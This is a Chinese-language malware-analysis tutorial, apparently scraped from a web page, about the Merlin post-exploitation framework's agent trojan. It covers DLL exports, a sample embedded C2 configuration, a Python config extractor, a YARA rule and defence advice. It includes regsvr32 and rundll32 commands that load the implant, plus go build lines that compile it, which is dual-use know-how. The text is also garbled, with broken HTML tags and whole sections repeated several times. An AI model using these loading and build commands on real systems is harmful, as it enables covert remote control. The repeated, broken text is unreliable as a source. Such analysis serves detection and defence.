Merlin后渗透利用框架之Merlin Agent远控木马深度剖析<\/h1>

1. 概述<\/h2>
Merlin是一个基于Golang开发的开源后渗透利用框架，由多个组件构成，包括Merlin Server、Merlin CLI、Merlin Agent EXE和Merlin Agent DLL。本教学文档将重点剖析Merlin Agent远控木马的技术细节。<\/p>

2. Merlin框架组件<\/h2>

Merlin Server<\/strong>：默认监听本地的50051端口<\/li>
Merlin CLI<\/strong>：命令行交互式界面，使用gRPC连接Merlin Server<\/li>
Merlin Agent EXE<\/strong>：可执行文件形式的木马<\/li>

Merlin Agent DLL<\/strong>：DLL形式的木马（攻击者常用）<\/li> <\/ul>
3. Merlin Agent DLL样本分析<\/h2>
3.1 样本基本信息<\/h3>

下载地址：https:\/\/github.com\/Ne0nd0g\/merlin-agent-dll\/releases<\/li>
样本版本：v2.3.1<\/li>
编译语言：Golang<\/li> <\/ul>
3.2 导出函数分析<\/h3>
Merlin Agent DLL提供了多个导出函数，便于不同方式加载：<\/p>

导出函数名<\/th> 功能描述<\/th> 加载方式<\/th> <\/tr> <\/thead>

DllInstall<\/td> 执行run(url)<\/td> regsvr32.exe \/s \/n \/i merlin.dll<\/code><\/td> <\/tr>
DllRegisterServer<\/td> 执行run(url)<\/td> regsvr32.exe \/s merlin.dll<\/code><\/td> <\/tr>
DllUnregisterServer<\/td> 执行run(url)<\/td> regsvr32.exe \/s \/u merlin.dll<\/code><\/td> <\/tr>
Merlin<\/td> 接受C *char字符串作为URL参数<\/td> DLL加载时使用<\/td> <\/tr>
Run<\/td> 从命令行参数获取URL<\/td> rundll32.exe merlin.dll,Run https:\/\/127.0.0.1:443<\/code><\/td> <\/tr>
VoidFunc<\/td> 执行run(url)<\/td> 与PowerSploit的Invoke-ReflectivePEInjection.ps1配合使用<\/td> <\/tr> <\/tbody> <\/table>
3.3 配置信息提取<\/h3>
Merlin Agent的配置信息在编译时通过-ldflags<\/code>参数嵌入，可通过以下方法快速提取：<\/p>
在样本文件中搜索-ldflags=<\/code>字符串<\/li> 提取到的配置信息示例：<\/li> <\/ol> -ldflags="-s -w -X \"main.auth=opaque\" -X \"main.addr=127.0.0.1:4444\" -X \"main.transforms=jwe,gob-base\" -X \"main.listener=\" -X \"github.com\/Ne0nd0g\/merlin-agent\/v2\/core.Build=d40b50a10e57c0b30f40e5af0dfb46bd4e692d69\" -X \"main.protocol=h2\" -X \"main.url=https:\/\/127.0.0.1:443\" -X \"main.host=\" -X \"main.httpClient=go\" -X \"main.psk=merlin\" -X \"main.secure=false\" -X \"main.sleep=30s\" -X \"main.proxy=\" -X \"main.useragent=Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.85 Safari\/537.36\" -X \"main.headers=\" -X \"main.skew=3000\" -X \"main.padding=4096\" -X \"main.killdate=0\" -X \"main.maxretry=7\" -X \"main.parrot=\" -H=windowsgui -buildid=" <\/code><\/pre> 关键配置参数说明：<\/p> auth<\/code>：认证方式<\/li> addr<\/code>：连接地址<\/li> transforms<\/code>：数据传输转换方式<\/li> protocol<\/code>：通信协议<\/li> url<\/code>：C2服务器地址<\/li> psk<\/code>：预共享密钥<\/li> sleep<\/code>：心跳间隔<\/li> useragent<\/code>：HTTP请求使用的User-Agent<\/li> killdate<\/code>：木马自毁日期<\/li> <\/ul> 3.4 自动化提取配置信息脚本<\/h3> 基于上述发现，可以编写自动化脚本提取配置信息：<\/p> import<\/span> re <\/span><\/span> <\/span><\/span>def<\/span> extract_merlin_config<\/span>(binary_data): <\/span><\/span> pattern =<\/span> rb<\/span>'-ldflags="(.+?)"'<\/span> <\/span><\/span> match =<\/span> re.<\/span>search(pattern, binary_data) <\/span><\/span> if<\/span> match: <\/span><\/span> config_str =<\/span> match.<\/span>group(1<\/span>).<\/span>decode('utf-8'<\/span>) <\/span><\/span> config_items =<\/span> re.<\/span>findall(r<\/span>'-X\s*<\/span>\\<\/span>"([^=]+)=([^<\/span>\\<\/span>]+)<\/span>\\<\/span>"'<\/span>, config_str) <\/span><\/span> return<\/span> dict(config_items) <\/span><\/span> return<\/span> {} <\/span><\/span> <\/span><\/span># 使用示例<\/span> <\/span><\/span>with<\/span> open('merlin-agent.dll'<\/span>, 'rb'<\/span>) as<\/span> f: <\/span><\/span> data =<\/span> f.<\/span>read() <\/span><\/span> config =<\/span> extract_merlin_config(data) <\/span><\/span> print(config) <\/span><\/span><\/code><\/pre>4. 编译原理分析<\/h2> Merlin Agent使用Golang的-ldflags<\/code>编译选项嵌入配置：<\/p> -s<\/code>：去除符号表和调试信息<\/li> -w<\/code>：去除DWARF调试信息<\/li> -X<\/code>：设置变量的值<\/li> <\/ul> Merlin项目使用Makefile进行编译，Makefile中定义了这些编译选项：<\/p> EXE木马Makefile示例<\/strong>：<\/p> build<\/span>:<\/span> <\/span><\/span> go build -ldflags=<\/span>"-s -w -X 'main.url=<\/span>$(<\/span>URL)<\/span>' -X 'main.psk=<\/span>$(<\/span>PSK)<\/span>'"<\/span> -o merlin-agent.exe <\/span><\/span><\/code><\/pre>DLL木马Makefile示例<\/strong>：<\/p> build<\/span>:<\/span> <\/span><\/span> go build -buildmode=<\/span>c-shared -ldflags=<\/span>"-s -w -X 'main.url=<\/span>$(<\/span>URL)<\/span>' -X 'main.psk=<\/span>$(<\/span>PSK)<\/span>'"<\/span> -o merlin-agent.dll <\/span><\/span><\/code><\/pre>5. 检测方法<\/h2> 5.1 YARA规则检测<\/h3> 可使用以下YARA规则检测Merlin Agent木马：<\/p> rule Merlin_Agent { meta: description = "Detects Merlin Agent malware" author = "Neo23x0" date = "2025-02-07" strings: $go = "Go build ID:" $merlin1 = "github.com\/Ne0nd0g\/merlin" $merlin2 = "main.run" $merlin3 = "main.(*Agent).Run" condition: all of them <\/code><\/pre> 5.2 行为特征检测<\/h3> 网络通信特征<\/strong>：<\/p> 定期心跳通信（默认30秒间隔）<\/li> 使用特定的User-Agent<\/li> HTTPS协议通信<\/li> <\/ul> <\/li> 进程行为特征<\/strong>：<\/p> 通过rundll32或regsvr32加载DLL<\/li> 无GUI界面运行（-H=windowsgui编译选项）<\/li> <\/ul> <\/li> 配置信息特征<\/strong>：<\/p> 样本中包含-ldflags=<\/code>字符串<\/li> 包含Merlin特定的配置参数<\/li> <\/ul> <\/li> <\/ol> 6. 防御建议<\/h2> 网络层防御<\/strong>：<\/p> 监控异常HTTPS连接<\/li> 检测使用默认User-Agent的请求<\/li> <\/ul> <\/li> 主机层防御<\/strong>：<\/p> 限制rundll32和regsvr32的执行<\/li> 监控异常DLL加载行为<\/li> <\/ul> <\/li> 样本检测<\/strong>：<\/p> 使用YARA规则扫描可疑文件<\/li> 检测Golang编译的DLL文件<\/li> 检查文件中是否包含-ldflags=<\/code>字符串<\/li> <\/ul> <\/li> 日志分析<\/strong>：<\/p> 分析进程创建日志，检测可疑的DLL加载<\/li> 监控网络连接日志，检测周期性外联<\/li> <\/ul> <\/li> <\/ol> 7. 总结<\/h2> Merlin Agent是一个功能强大的开源远控木马，具有以下特点：<\/p> 使用Golang开发，跨平台兼容性好<\/li> 提供多种加载方式，隐蔽性强<\/li> 配置信息编译时嵌入，但可通过特定方法提取<\/li> 采用模块化设计，功能可扩展<\/li> <\/ol> 通过深入分析其技术细节，可以有效检测和防御此类威胁。防御者应重点关注Golang编译的DLL文件、特定的加载方式以及网络通信特征。<\/p>

导出函数名<\/th>	功能描述<\/th>	加载方式<\/th> <\/tr> <\/thead>
DllInstall<\/td>	执行run(url)<\/td>	`regsvr32.exe \/s \/n \/i merlin.dll<\/code><\/td> <\/tr>`
DllRegisterServer<\/td>	执行run(url)<\/td>	`regsvr32.exe \/s merlin.dll<\/code><\/td> <\/tr>`
DllUnregisterServer<\/td>	执行run(url)<\/td>	`regsvr32.exe \/s \/u merlin.dll<\/code><\/td> <\/tr>`
Merlin<\/td>	接受C *char字符串作为URL参数<\/td>	DLL加载时使用<\/td> <\/tr>
Run<\/td>	从命令行参数获取URL<\/td>	`rundll32.exe merlin.dll,Run https:\/\/127.0.0.1:443<\/code><\/td> <\/tr>`
VoidFunc<\/td>	执行run(url)<\/td>	与PowerSploit的Invoke-ReflectivePEInjection.ps1配合使用<\/td> <\/tr> <\/tbody> <\/table> 3.3 配置信息提取<\/h3> Merlin Agent的配置信息在编译时通过`-ldflags<\/code>参数嵌入，可通过以下方法快速提取：<\/p>` 在样本文件中搜索-ldflags=<\/code>字符串<\/li> 提取到的配置信息示例：<\/li> <\/ol> -ldflags="-s -w -X \"main.auth=opaque\" -X \"main.addr=127.0.0.1:4444\" -X \"main.transforms=jwe,gob-base\" -X \"main.listener=\" -X \"github.com\/Ne0nd0g\/merlin-agent\/v2\/core.Build=d40b50a10e57c0b30f40e5af0dfb46bd4e692d69\" -X \"main.protocol=h2\" -X \"main.url=https:\/\/127.0.0.1:443\" -X \"main.host=\" -X \"main.httpClient=go\" -X \"main.psk=merlin\" -X \"main.secure=false\" -X \"main.sleep=30s\" -X \"main.proxy=\" -X \"main.useragent=Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.85 Safari\/537.36\" -X \"main.headers=\" -X \"main.skew=3000\" -X \"main.padding=4096\" -X \"main.killdate=0\" -X \"main.maxretry=7\" -X \"main.parrot=\" -H=windowsgui -buildid=" <\/code><\/pre> 关键配置参数说明：<\/p> auth<\/code>：认证方式<\/li> addr<\/code>：连接地址<\/li> transforms<\/code>：数据传输转换方式<\/li> protocol<\/code>：通信协议<\/li> url<\/code>：C2服务器地址<\/li> psk<\/code>：预共享密钥<\/li> sleep<\/code>：心跳间隔<\/li> useragent<\/code>：HTTP请求使用的User-Agent<\/li> killdate<\/code>：木马自毁日期<\/li> <\/ul> 3.4 自动化提取配置信息脚本<\/h3> 基于上述发现，可以编写自动化脚本提取配置信息：<\/p> import<\/span> re <\/span><\/span> <\/span><\/span>def<\/span> extract_merlin_config<\/span>(binary_data): <\/span><\/span> pattern =<\/span> rb<\/span>'-ldflags="(.+?)"'<\/span> <\/span><\/span> match =<\/span> re.<\/span>search(pattern, binary_data) <\/span><\/span> if<\/span> match: <\/span><\/span> config_str =<\/span> match.<\/span>group(1<\/span>).<\/span>decode('utf-8'<\/span>) <\/span><\/span> config_items =<\/span> re.<\/span>findall(r<\/span>'-X\s<\/span>\\<\/span>"([^=]+)=([^<\/span>\\<\/span>]+)<\/span>\\<\/span>"'<\/span>, config_str) <\/span><\/span> return<\/span> dict(config_items) <\/span><\/span> return<\/span> {} <\/span><\/span> <\/span><\/span># 使用示例<\/span> <\/span><\/span>with<\/span> open('merlin-agent.dll'<\/span>, 'rb'<\/span>) as<\/span> f: <\/span><\/span> data =<\/span> f.<\/span>read() <\/span><\/span> config =<\/span> extract_merlin_config(data) <\/span><\/span> print(config) <\/span><\/span><\/code><\/pre>4. 编译原理分析<\/h2> Merlin Agent使用Golang的-ldflags<\/code>编译选项嵌入配置：<\/p> -s<\/code>：去除符号表和调试信息<\/li> -w<\/code>：去除DWARF调试信息<\/li> -X<\/code>：设置变量的值<\/li> <\/ul> Merlin项目使用Makefile进行编译，Makefile中定义了这些编译选项：<\/p> EXE木马Makefile示例<\/strong>：<\/p> build<\/span>:<\/span> <\/span><\/span> go build -ldflags=<\/span>"-s -w -X 'main.url=<\/span>$(<\/span>URL)<\/span>' -X 'main.psk=<\/span>$(<\/span>PSK)<\/span>'"<\/span> -o merlin-agent.exe <\/span><\/span><\/code><\/pre>DLL木马Makefile示例<\/strong>：<\/p> build<\/span>:<\/span> <\/span><\/span> go build -buildmode=<\/span>c-shared -ldflags=<\/span>"-s -w -X 'main.url=<\/span>$(<\/span>URL)<\/span>' -X 'main.psk=<\/span>$(<\/span>PSK)<\/span>'"<\/span> -o merlin-agent.dll <\/span><\/span><\/code><\/pre>5. 检测方法<\/h2> 5.1 YARA规则检测<\/h3> 可使用以下YARA规则检测Merlin Agent木马：<\/p> rule Merlin_Agent { meta: description = "Detects Merlin Agent malware" author = "Neo23x0" date = "2025-02-07" strings: $go = "Go build ID:" $merlin1 = "github.com\/Ne0nd0g\/merlin" $merlin2 = "main.run" $merlin3 = "main.(Agent).Run" condition: all of them <\/code><\/pre> 5.2 行为特征检测<\/h3> 网络通信特征<\/strong>：<\/p> 定期心跳通信（默认30秒间隔）<\/li> 使用特定的User-Agent<\/li> HTTPS协议通信<\/li> <\/ul> <\/li> 进程行为特征<\/strong>：<\/p> 通过rundll32或regsvr32加载DLL<\/li> 无GUI界面运行（-H=windowsgui编译选项）<\/li> <\/ul> <\/li> 配置信息特征<\/strong>：<\/p> 样本中包含-ldflags=<\/code>字符串<\/li> 包含Merlin特定的配置参数<\/li> <\/ul> <\/li> <\/ol> 6. 防御建议<\/h2> 网络层防御<\/strong>：<\/p> 监控异常HTTPS连接<\/li> 检测使用默认User-Agent的请求<\/li> <\/ul> <\/li> 主机层防御<\/strong>：<\/p> 限制rundll32和regsvr32的执行<\/li> 监控异常DLL加载行为<\/li> <\/ul> <\/li> 样本检测<\/strong>：<\/p> 使用YARA规则扫描可疑文件<\/li> 检测Golang编译的DLL文件<\/li> 检查文件中是否包含-ldflags=<\/code>字符串<\/li> <\/ul> <\/li> 日志分析<\/strong>：<\/p> 分析进程创建日志，检测可疑的DLL加载<\/li> 监控网络连接日志，检测周期性外联<\/li> <\/ul> <\/li> <\/ol> 7. 总结<\/h2> Merlin Agent是一个功能强大的开源远控木马，具有以下特点：<\/p> 使用Golang开发，跨平台兼容性好<\/li> 提供多种加载方式，隐蔽性强<\/li> 配置信息编译时嵌入，但可通过特定方法提取<\/li> 采用模块化设计，功能可扩展<\/li> <\/ol> 通过深入分析其技术细节，可以有效检测和防御此类威胁。防御者应重点关注Golang编译的DLL文件、特定的加载方式以及网络通信特征。<\/p>

Merlin后渗透利用框架之Merlin Agent远控木马深度剖析<\/h1>

1. 概述<\/h2> Merlin是一个基于Golang开发的开源后渗透利用框架，由多个组件构成，包括Merlin Server、Merlin CLI、Merlin Agent EXE和Merlin Agent DLL。本教学文档将重点剖析Merlin Agent远控木马的技术细节。<\/p>

3. Merlin Agent DLL样本分析<\/h2>

5. 检测方法<\/h2>

1. 概述<\/h2>
Merlin是一个基于Golang开发的开源后渗透利用框架，由多个组件构成，包括Merlin Server、Merlin CLI、Merlin Agent EXE和Merlin Agent DLL。本教学文档将重点剖析Merlin Agent远控木马的技术细节。<\/p>